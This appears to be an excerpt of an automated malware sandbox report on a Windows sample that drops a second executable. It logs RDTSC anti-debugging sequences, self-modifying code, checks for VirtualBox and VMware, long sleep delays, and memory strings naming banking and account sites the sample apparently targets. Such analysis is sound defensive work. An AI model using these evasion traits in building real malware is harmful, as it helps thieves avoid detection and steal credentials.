          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37E09 second address: E37E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65B4EE8BCAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37E18 second address: E37E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37F94 second address: E37FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BD7h 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3822A second address: E3822F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C2CD second address: E3C30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 08186511h 0x0000000d mov edi, dword ptr [ebp+122D2EB2h] 0x00000013 lea ebx, dword ptr [ebp+12452112h] 0x00000019 clc 0x0000001a xchg eax, ebx 0x0000001b push ebx 0x0000001c jp 00007F65B4EE8BDBh 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push ecx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C30A second address: E3C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C4A2 second address: E3C50D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F65B4EE8BC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F65B4EE8BD4h 0x00000013 jmp 00007F65B4EE8BD8h 0x00000018 popad 0x00000019 lea ebx, dword ptr [ebp+1245211Bh] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F65B4EE8BC8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 movsx ecx, ax 0x0000003c push eax 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C571 second address: E3C575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C575 second address: E3C57B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C57B second address: E3C580 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C580 second address: E3C5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 js 00007F65B4EE8BDBh 0x0000000e call 00007F65B4EE8BD4h 0x00000013 pop ecx 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D1E3Ch], esi 0x0000001c push A2C1D6ADh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C5B6 second address: E3C5C0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C5C0 second address: E3C60E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5D3E29D3h 0x0000000f or dh, FFFFFFF3h 0x00000012 push 00000003h 0x00000014 clc 0x00000015 push 00000000h 0x00000017 jmp 00007F65B4EE8BD8h 0x0000001c push 00000003h 0x0000001e xor dword ptr [ebp+122D1E9Ch], edx 0x00000024 call 00007F65B4EE8BC9h 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F65B4EE8BCCh 0x00000031 jnc 00007F65B4EE8BC6h 0x00000037 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C60E second address: E3C648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F65B529F4C0h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F65B529F4BBh 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C648 second address: E3C64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C64C second address: E3C65A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F65B529F4B6h 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C65A second address: E3C696 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B4EE8BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F65B4EE8BCEh 0x00000014 pop eax 0x00000015 mov ecx, dword ptr [ebp+122D28ECh] 0x0000001b lea ebx, dword ptr [ebp+12452126h] 0x00000021 mov ecx, dword ptr [ebp+122D2B38h] 0x00000027 sub dword ptr [ebp+122D39F6h], esi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E3C696 second address: E3C69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5CA5B second address: E5CA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5CA61 second address: E5CA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5CA67 second address: E5CA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BD2h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E294A5 second address: E294C2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65B529F4B6h 0x00000008 jmp 00007F65B529F4C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5A9D8 second address: E5A9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5A9DE second address: E5A9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5A9E4 second address: E5AA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BD9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AA08 second address: E5AA26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jng 00007F65B529F4C8h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F65B529F4B6h 0x0000001a popad 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5ACBA second address: E5ACDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD4h 0x00000007 jns 00007F65B4EE8BC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AF9A second address: E5AF9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AF9E second address: E5AFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65B4EE8BCFh 0x0000000d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AFB5 second address: E5AFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AFBB second address: E5AFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5AFBF second address: E5AFD3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F65B529F4BEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5B5A6 second address: E5B5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5B6D1 second address: E5B707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F65B529F4C8h 0x0000000a pop edi 0x0000000b js 00007F65B529F4D2h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F65B529F4B6h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5B707 second address: E5B70B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5B858 second address: E5B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F65B529F4C0h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E4F90F second address: E4F940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F65B4EE8BC6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F65B4EE8BCAh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F65B4EE8BD9h 0x0000001d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E5EB56 second address: E5EB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F65B529F4BAh 0x0000000b popad 0x0000000c je 00007F65B529F4CFh 0x00000012 jmp 00007F65B529F4C9h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E31A3D second address: E31A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BCCh 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E31A51 second address: E31A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65B529F4B6h 0x0000000a pop ecx 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E31A5C second address: E31A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E31A61 second address: E31A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E31A67 second address: E31A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E6369D second address: E636AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E636AD second address: E636B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E636B5 second address: E636C2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E27927 second address: E27934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jng 00007F65B4EE8BC6h 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E27934 second address: E27940 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65B529F4BEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E6849E second address: E684A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F65B4EE8BC6h 0x0000000a pop ebx 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E684A9 second address: E684C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68904 second address: E6891C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65B4EE8BD3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E6891C second address: E6894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 je 00007F65B529F4B6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jne 00007F65B529F4CFh 0x0000001a jmp 00007F65B529F4C3h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E6894B second address: E68959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jg 00007F65B4EE8BC6h 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68959 second address: E6895D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E6895D second address: E68966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68966 second address: E6896C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D12 second address: E68D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BD4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D2F second address: E68D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D33 second address: E68D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D39 second address: E68D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65B529F4BFh 0x00000008 js 00007F65B529F4B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D53 second address: E68D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F65B4EE8BD3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F65B4EE8BE6h 0x00000012 jp 00007F65B4EE8BCCh 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D85 second address: E68D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E68D89 second address: E68D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 18C122 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 354637 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 18EDC0 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3345E6 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 18ED91 instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeSpecial instruction interceptor: First address: E5F77F instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeMemory allocated: 4930000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeMemory allocated: 4CB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeMemory allocated: 4AD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00E3C299 rdtsc 6_2_00E3C299
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exe TID: 5888Thread sleep time: -46023s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6212Thread sleep count: 46 > 30Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6212Thread sleep time: -92046s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 3852Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 6772Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe TID: 2864Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: file.exe, UK2346Q4E08RPNV0H.exe.0.drBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: file.exe, file.exe, 00000000.00000003.2204926355.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217166199.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204926355.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: file.exe, 00000000.00000003.2172910141.0000000005C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: file.exe, 00000000.00000003.2172910141.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
